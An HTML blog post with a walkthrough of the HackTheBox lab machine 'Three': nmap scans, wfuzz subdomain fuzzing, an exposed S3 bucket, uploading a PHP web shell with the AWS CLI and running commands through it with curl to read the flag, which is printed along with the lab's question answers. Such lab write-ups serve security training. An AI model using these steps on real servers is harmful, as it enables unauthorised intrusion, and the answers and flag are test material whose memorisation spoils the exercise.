<!DOCTYPE html><html class="appearance-dark" lang="en"><head><meta charset="UTF-8"><title>Three</title><meta name="description" content="scientia potentia est."><meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no, initial-scale=1"><!-- Google Analytics --><!-- End Google Analytics -->
<!-- Baidu Analytics --><!-- End Baidu Analytics --><link rel="icon" href="/hexo-theme-Claudia/images/favicon.jpg"><link rel="stylesheet" href="/style/common/bulma.css"><link rel="stylesheet" href="/style/base.css"><link rel="stylesheet" href="/style/common/helper.css"><script src="/js/common.js"></script><link rel="stylesheet" href="/style/post.css"><link rel="stylesheet" href="/style/themes/highlight-theme-light.css"><link rel="stylesheet" href="/style/common/jquery.fancybox.min.css"><script src="/js/highlight.pack.js"></script><meta name="description" content="
Information GatheringMachine IP: 10.129.227.248
NMAP Scanning:┌──(kali㉿kali)-[~/Desktop/Workspace/HTB/starting]
└─$ sudo nmap -p- -sS --min-rate 5000 --open -T5 -vvv -Pn 10.129.227.248
[sudo] password for kali: 
Host discovery disabled (-Pn). All addresses will be marked &amp;#x27;up&amp;#x27; and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org.."><meta name="generator" content="Hexo 7.1.1"></head><body class="is-flex is-flex-direction-column"><header class="header-widget is-flex-shrink-0 is-hidden-mobile"><div class="container is-fullhd is-flex is-justify-content-space-between is-align-items-center is-full-height"><section class="is-hidden-mobile is-flex-shrink-0"><h2><a href="/">Rãzvan's blog</a></h2></section><h3 class="is-hidden-mobile is-family-serif is-full-height is-flex is-align-items-center is-flex-shrink-0"><div class="is-full-height" id="postTopic"><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">Three</p><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">Click back to the top</p></div></h3><aside class="is-flex-shrink-0"><h3 class="is-inline-block"><a href="/">Home</a></h3><h3 class="is-inline-block"><a href="/archives">Archives</a></h3></aside></div></header><header class="is-flex header-widget is-flex-shrink-0 is-align-items-center is-justify-content-center is-hidden-tablet"><h3 class="is-inline-block"><a href="/">Home</a></h3><h3 class="is-inline-block"><a href="/archives">Archives</a></h3></header><main><main class="container is-max-widescreen content section post-page pt-4 px-4"><div class="columns is-flex-desktop is-justify-content-center is-flex-direction-row-reverse"><div class="column is-3 is-hidden-mobile"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Information-Gathering"><span class="toc-text">Information Gathering</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#NMAP-Scanning"><span class="toc-text">NMAP Scanning:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#FULL-NMAP-Scanning"><span class="toc-text">FULL NMAP Scanning:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#FUZZING"><span class="toc-text">FUZZING</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#WFUZZ"><span class="toc-text">WFUZZ</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploitation"><span class="toc-text">Exploitation</span></a></li></ol></div><div class="column is-9"><header class="my-4"><a href="/tags/HackTheBox"><i class="tag post-item-tag">HackTheBox</i></a><a href="/tags/Very%20Easy"><i class="tag post-item-tag">Very Easy</i></a></header><h1 class="mt-0 mb-1 is-family-serif" id="postTitle">Three</h1><time class="has-text-grey" datetime="2024-05-22T01:01:44.000Z">2024-05-22</time><article class="mt-2 post-content"><p><img src="/../Three_img/49fa1274ca631fd870e9feca35b7d7c2.webp" alt="alt text"></p>
<h2 id="Information-Gathering"><a href="#Information-Gathering" class="headerlink" title="Information Gathering"></a>Information Gathering</h2><p>Machine IP: 10.129.227.248</p>
<h3 id="NMAP-Scanning"><a href="#NMAP-Scanning" class="headerlink" title="NMAP Scanning:"></a>NMAP Scanning:</h3><pre><code class="hljs powershell">┌──(kali㉿kali)-[~/<span class="hljs-type">Desktop</span>/<span class="hljs-type">Workspace</span>/<span class="hljs-type">HTB</span>/<span class="hljs-type">starting</span>]
└─<span class="hljs-variable">$</span> sudo nmap <span class="hljs-literal">-p-</span> <span class="hljs-literal">-sS</span> <span class="hljs-literal">--min-rate</span> <span class="hljs-number">5000</span> <span class="hljs-literal">--open</span> <span class="hljs-literal">-T5</span> <span class="hljs-literal">-vvv</span> <span class="hljs-literal">-Pn</span> <span class="hljs-number">10.129</span>.<span class="hljs-number">227.248</span>
[<span class="hljs-type">sudo</span>] password <span class="hljs-keyword">for</span> kali: 
Host discovery disabled (<span class="hljs-literal">-Pn</span>). All addresses will be marked <span class="hljs-string">&#x27;up&#x27;</span> and scan times may be slower.
Starting Nmap <span class="hljs-number">7.94</span>SVN ( https://nmap.org ) at <span class="hljs-number">2024</span><span class="hljs-literal">-05-20</span> <span class="hljs-number">19</span>:<span class="hljs-number">12</span> EDT
Initiating Parallel DNS resolution of <span class="hljs-number">1</span> host. at <span class="hljs-number">19</span>:<span class="hljs-number">12</span>
Completed Parallel DNS resolution of <span class="hljs-number">1</span> host. at <span class="hljs-number">19</span>:<span class="hljs-number">12</span>, <span class="hljs-number">0.13</span>s elapsed
DNS resolution of <span class="hljs-number">1</span> IPs took <span class="hljs-number">0.13</span>s. Mode: Async [<span class="hljs-comment">#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]</span>
<span class="hljs-type">Initiating</span> <span class="hljs-type">SYN</span> <span class="hljs-type">Stealth</span> <span class="hljs-type">Scan</span> <span class="hljs-type">at</span> <span class="hljs-number">19</span>:<span class="hljs-number">12</span>
<span class="hljs-type">Scanning</span> <span class="hljs-number">10.129</span><span class="hljs-type">.227.248</span> [<span class="hljs-number">65535</span> <span class="hljs-type">ports</span>]
<span class="hljs-type">Discovered</span> <span class="hljs-type">open</span> <span class="hljs-type">port</span> <span class="hljs-number">80</span>/<span class="hljs-type">tcp</span> <span class="hljs-type">on</span> <span class="hljs-number">10.129</span><span class="hljs-type">.227.248</span>
<span class="hljs-type">Discovered</span> <span class="hljs-type">open</span> <span class="hljs-type">port</span> <span class="hljs-number">22</span>/<span class="hljs-type">tcp</span> <span class="hljs-type">on</span> <span class="hljs-number">10.129</span><span class="hljs-type">.227.248</span>
<span class="hljs-type">Completed</span> <span class="hljs-type">SYN</span> <span class="hljs-type">Stealth</span> <span class="hljs-type">Scan</span> <span class="hljs-type">at</span> <span class="hljs-number">19</span>:<span class="hljs-number">12</span>, <span class="hljs-number">17.75</span><span class="hljs-type">s</span> <span class="hljs-type">elapsed</span> (<span class="hljs-number">65535</span> <span class="hljs-type">total</span> <span class="hljs-type">ports</span>)
<span class="hljs-type">Nmap</span> <span class="hljs-type">scan</span> <span class="hljs-type">report</span> <span class="hljs-type">for</span> <span class="hljs-number">10.129</span><span class="hljs-type">.227.248</span>
<span class="hljs-type">Host</span> <span class="hljs-type">is</span> <span class="hljs-type">up</span>, <span class="hljs-type">received</span> <span class="hljs-type">user</span>-<span class="hljs-type">set</span> (<span class="hljs-number">0.081</span><span class="hljs-type">s</span> <span class="hljs-type">latency</span>)<span class="hljs-type">.</span>
<span class="hljs-type">Scanned</span> <span class="hljs-type">at</span> <span class="hljs-number">2024</span>-<span class="hljs-number">05</span>-<span class="hljs-number">20</span> <span class="hljs-number">19</span>:<span class="hljs-number">12</span>:<span class="hljs-number">18</span> <span class="hljs-type">EDT</span> <span class="hljs-type">for</span> <span class="hljs-number">18</span><span class="hljs-type">s</span>
<span class="hljs-type">Not</span> <span class="hljs-type">shown</span>: <span class="hljs-number">56509</span> <span class="hljs-type">closed</span> <span class="hljs-type">tcp</span> <span class="hljs-type">ports</span> (<span class="hljs-type">reset</span>), <span class="hljs-number">9024</span> <span class="hljs-type">filtered</span> <span class="hljs-type">tcp</span> <span class="hljs-type">ports</span> (<span class="hljs-type">no</span>-<span class="hljs-type">response</span>)
<span class="hljs-type">Some</span> <span class="hljs-type">closed</span> <span class="hljs-type">ports</span> <span class="hljs-type">may</span> <span class="hljs-type">be</span> <span class="hljs-type">reported</span> <span class="hljs-type">as</span> <span class="hljs-type">filtered</span> <span class="hljs-type">due</span> <span class="hljs-type">to</span> --<span class="hljs-type">defeat</span>-<span class="hljs-type">rst</span>-<span class="hljs-type">ratelimit</span>
<span class="hljs-type">PORT</span>   <span class="hljs-type">STATE</span> <span class="hljs-type">SERVICE</span> <span class="hljs-type">REASON</span>
<span class="hljs-number">22</span>/<span class="hljs-type">tcp</span> <span class="hljs-type">open</span>  <span class="hljs-type">ssh</span>     <span class="hljs-type">syn</span>-<span class="hljs-type">ack</span> <span class="hljs-type">ttl</span> <span class="hljs-number">63</span>
<span class="hljs-number">80</span>/<span class="hljs-type">tcp</span> <span class="hljs-type">open</span>  <span class="hljs-type">http</span>    <span class="hljs-type">syn</span>-<span class="hljs-type">ack</span> <span class="hljs-type">ttl</span> <span class="hljs-number">63</span>

<span class="hljs-type">Read</span> <span class="hljs-type">data</span> <span class="hljs-type">files</span> <span class="hljs-type">from</span>: /<span class="hljs-type">usr</span>/<span class="hljs-type">bin</span>/<span class="hljs-type">..</span>/<span class="hljs-type">share</span>/<span class="hljs-type">nmap</span>
<span class="hljs-type">Nmap</span> <span class="hljs-type">done</span>: <span class="hljs-number">1</span> <span class="hljs-type">IP</span> <span class="hljs-type">address</span> (<span class="hljs-number">1</span> <span class="hljs-type">host</span> <span class="hljs-type">up</span>) <span class="hljs-type">scanned</span> <span class="hljs-type">in</span> <span class="hljs-number">17.99</span> <span class="hljs-type">seconds</span>
           <span class="hljs-type">Raw</span> <span class="hljs-type">packets</span> <span class="hljs-type">sent</span>: <span class="hljs-number">87952</span> (<span class="hljs-number">3.870</span><span class="hljs-type">MB</span>) | <span class="hljs-type">Rcvd</span>: <span class="hljs-number">65148</span> (<span class="hljs-number">2.606</span><span class="hljs-type">MB</span>)</code></pre>

<h3 id="FULL-NMAP-Scanning"><a href="#FULL-NMAP-Scanning" class="headerlink" title="FULL NMAP Scanning:"></a>FULL NMAP Scanning:</h3><pre><code class="hljs powershell">┌──(kali㉿kali)-[~/<span class="hljs-type">Desktop</span>/<span class="hljs-type">Workspace</span>/<span class="hljs-type">HTB</span>/<span class="hljs-type">starting</span>]
└─<span class="hljs-variable">$</span> nmap <span class="hljs-literal">-A</span> <span class="hljs-literal">-sC</span> <span class="hljs-literal">-sV</span> <span class="hljs-literal">-p22</span>,<span class="hljs-number">80</span>  <span class="hljs-number">10.129</span>.<span class="hljs-number">227.248</span> <span class="hljs-literal">-Pn</span>
Starting Nmap <span class="hljs-number">7.94</span>SVN ( https://nmap.org ) at <span class="hljs-number">2024</span><span class="hljs-literal">-05-20</span> <span class="hljs-number">19</span>:<span class="hljs-number">12</span> EDT
Nmap scan report <span class="hljs-keyword">for</span> <span class="hljs-number">10.129</span>.<span class="hljs-number">227.248</span>
Host is up (<span class="hljs-number">0.14</span>s latency).

PORT   STATE SERVICE VERSION
<span class="hljs-number">22</span>/tcp open  ssh     OpenSSH <span class="hljs-number">7.6</span>p1 Ubuntu <span class="hljs-number">4</span>ubuntu0.<span class="hljs-number">7</span> (Ubuntu Linux; protocol <span class="hljs-number">2.0</span>)
| ssh<span class="hljs-literal">-hostkey</span>: 
|   <span class="hljs-number">2048</span> <span class="hljs-number">17</span>:<span class="hljs-number">8</span>b:d4:<span class="hljs-number">25</span>:<span class="hljs-number">45</span>:<span class="hljs-number">2</span>a:<span class="hljs-number">20</span>:b8:<span class="hljs-number">79</span>:f8:e2:<span class="hljs-number">58</span>:d7:<span class="hljs-number">8</span>e:<span class="hljs-number">79</span>:f4 (RSA)
|   <span class="hljs-number">256</span> e6:<span class="hljs-number">0</span>f:<span class="hljs-number">1</span>a:f6:<span class="hljs-number">32</span>:<span class="hljs-number">8</span>a:<span class="hljs-number">40</span>:ef:<span class="hljs-number">2</span>d:a7:<span class="hljs-number">3</span>b:<span class="hljs-number">22</span>:d1:c7:<span class="hljs-number">14</span>:fa (ECDSA)
|_  <span class="hljs-number">256</span> <span class="hljs-number">2</span>d:e1:<span class="hljs-number">87</span>:<span class="hljs-number">41</span>:<span class="hljs-number">75</span>:f3:<span class="hljs-number">91</span>:<span class="hljs-number">54</span>:<span class="hljs-number">41</span>:<span class="hljs-number">16</span>:b7:<span class="hljs-number">2</span>b:<span class="hljs-number">80</span>:c6:<span class="hljs-number">8</span>f:<span class="hljs-number">05</span> (ED25519)
<span class="hljs-number">80</span>/tcp open  http    Apache httpd <span class="hljs-number">2.4</span>.<span class="hljs-number">29</span> ((Ubuntu))
|_http<span class="hljs-literal">-title</span>: The Toppers
|_http<span class="hljs-literal">-server-header</span>: Apache/<span class="hljs-number">2.4</span>.<span class="hljs-number">29</span> (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: <span class="hljs-number">1</span> IP address (<span class="hljs-number">1</span> host up) scanned <span class="hljs-keyword">in</span> <span class="hljs-number">23.35</span> seconds
</code></pre>

<p> How many TCP ports are open? </p>
<ul>
<li>2</li>
</ul>
<p> What is the domain of the email address provided in the “Contact” section of the website? </p>
<p><img src="/../Three_img/1.png" alt="alt text"></p>
<ul>
<li>thetoppers.htb</li>
</ul>
<p> In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames? </p>
<ul>
<li>&#x2F;etc&#x2F;hosts</li>
</ul>
<p> Which sub-domain is discovered during further enumeration? </p>
<h2 id="FUZZING"><a href="#FUZZING" class="headerlink" title="FUZZING"></a>FUZZING</h2><h3 id="WFUZZ"><a href="#WFUZZ" class="headerlink" title="WFUZZ"></a>WFUZZ</h3><ul>
<li>command used: <pre><code class="hljs bash">wfuzz -c -w /home/kali/Desktop/Workspace/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -H <span class="hljs-string">&quot;Host: FUZZ.thetoppers.htb&quot;</span> --hl 1234</code></pre></li>
</ul>
<p><img src="/../Three_img/2.png" alt="alt text"></p>
<p>All the responses are 200 OK there is only one  404 so let’s see if this is the one :</p>
<p>Add it to <code>/etc/hosts</code></p>
<p><img src="/../Three_img/3.png" alt="alt text"></p>
<p><img src="/../Three_img/4.png" alt="alt text"></p>
<p>Answer: </p>
<ul>
<li>s3.thetoppers.htb</li>
</ul>
<p> Which service is running on the discovered sub-domain?</p>
<p><img src="/../Three_img/5.png" alt="alt text"></p>
<p><img src="/../Three_img/6.png" alt="alt text"></p>
<ul>
<li>Amazon s3</li>
</ul>
<p> Which command line utility can be used to interact with the service running on the discovered sub-domain? </p>
<p><img src="/../Three_img/7.png" alt="alt text"></p>
<ul>
<li>AWSCLI</li>
</ul>
<p> Which command is used to set up the AWS CLI installation? </p>
<p><img src="/../Three_img/8.png" alt="alt text"></p>
<ul>
<li>aws configure</li>
</ul>
<p> What is the command used by the above utility to list all of the S3 buckets? </p>
<ul>
<li>aws s3 ls</li>
</ul>
<p> This server is configured to run files written in what web scripting language? </p>
<pre><code class="hljs powershell">sudo apt install awscli</code></pre>

<p>Configure aws</p>
<p><img src="/../Three_img/9.png" alt="alt text"></p>
<p>Try to connect to the s3 bucket</p>
<p><img src="/../Three_img/10.png" alt="alt text"></p>
<p>Answer:</p>
<ul>
<li>php</li>
</ul>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><p>Submit root flag:</p>
<p>We’re gonna use this github manual to upload a simple webshell:</p>
<p><a target="_blank" rel="noopener" href="https://gist.github.com/nicolasdao/edc30b5ad57f1e2147cf3b63bd76f6a9">AWS CLI manual. Keywords: aws cli aws-cli s3</a></p>
<p><img src="/../Three_img/11.png" alt="alt text"></p>
<p>Upload a WebShell:</p>
<pre><code class="hljs powershell">┌──(kali㉿kali)-[~/<span class="hljs-type">Desktop</span>/<span class="hljs-type">Workspace</span>/<span class="hljs-type">HTB</span>/<span class="hljs-type">starting</span>]
└─<span class="hljs-variable">$</span> aws s3 <span class="hljs-built_in">cp</span> shell.php <span class="hljs-literal">--endpoint-url</span>=http://s3.thetoppers.htb s3://thetoppers.htb</code></pre>

<p>Check if the file has been uploaded:</p>
<p><img src="/../Three_img/12.png" alt="alt text"></p>
<p>Now we use curl to get the flag:</p>
<pre><code class="hljs powershell">┌──(kali㉿kali)-[~]
└─<span class="hljs-variable">$</span> <span class="hljs-built_in">curl</span> <span class="hljs-string">&quot;http://thetoppers.htb/shell.php?cmd=whoami&quot;</span>

<span class="hljs-comment"># Take input from the url paramter. shell.php?cmd=whoami</span>
www<span class="hljs-literal">-data</span>

┌──(kali㉿kali)-[~]
└─<span class="hljs-variable">$</span> <span class="hljs-built_in">curl</span> <span class="hljs-string">&quot;http://thetoppers.htb/shell.php?cmd=ls+../&quot;</span>

<span class="hljs-comment"># Take input from the url paramter. shell.php?cmd=whoami</span>
flag.txt
html

┌──(kali㉿kali)-[~]
└─<span class="hljs-variable">$</span> <span class="hljs-built_in">curl</span> <span class="hljs-string">&quot;http://thetoppers.htb/shell.php?cmd=cat+../flag.txt&quot;</span>

<span class="hljs-comment"># Take input from the url paramter. shell.php?cmd=whoami</span>
a980d99281a28d638ac68b9bf9453c2b
</code></pre>

<p>FLAG : <code>a980d99281a28d638ac68b9bf9453c2b</code></p>
</article><section class="jump-container is-flex is-justify-content-space-between my-6"><!-- em is empty placeholder--><em></em><a class="button is-default" href="/2024/05/22/Responder/" title="Responder"><span class="has-text-weight-semibold">Next: Responder</span><i class="iconfont icon-next ml-2 has-text-grey"></i></a></section></div></div></main></main><footer class="is-flex is-flex-direction-column is-align-items-center is-flex-shrink-0 is-family-serif"><section class="sns-container"><!-- Github--><!-- Ins--><!-- RSS--><!-- 知乎--><!-- 领英--><a title="linkedin" target="_blank" rel="noopener nofollow" href="//www.linkedin.com/in/razvan-popa-333740293"><i class="iconfont icon-linkedin"></i></a><!-- 脸书--></section><p><span>Copyright ©</span><span> Rãzvan 2024</span></p><div class="is-flex is-justify-content-center is-flex-wrap-wrap"><p>Powered by Hexo &verbar;&nbsp;</p><p class="is-flex is-justify-content-center"><a title="Hexo theme author" target="_blank" rel="noopener" href="//github.com/haojen">Theme by Haojen&nbsp;</a></p><div style="margin-top: 2px"><a class="github-button" title="github-button" target="_blank" rel="noopener" href="https://github.com/haojen/hexo-theme-Claudia" data-color-scheme="no-preference: light; light: light; dark: dark;" data-show-count="true"></a></div></div><div><span></span></div></footer><script async defer src="https://buttons.github.io/buttons.js"></script><script src="/js/jquery-3.6.1.min.js"></script><script src="/js/jquery-fancybox.min.js"></script><script src="/js/img_zoom.js"></script><script src="/js/post.js"></script></body></html>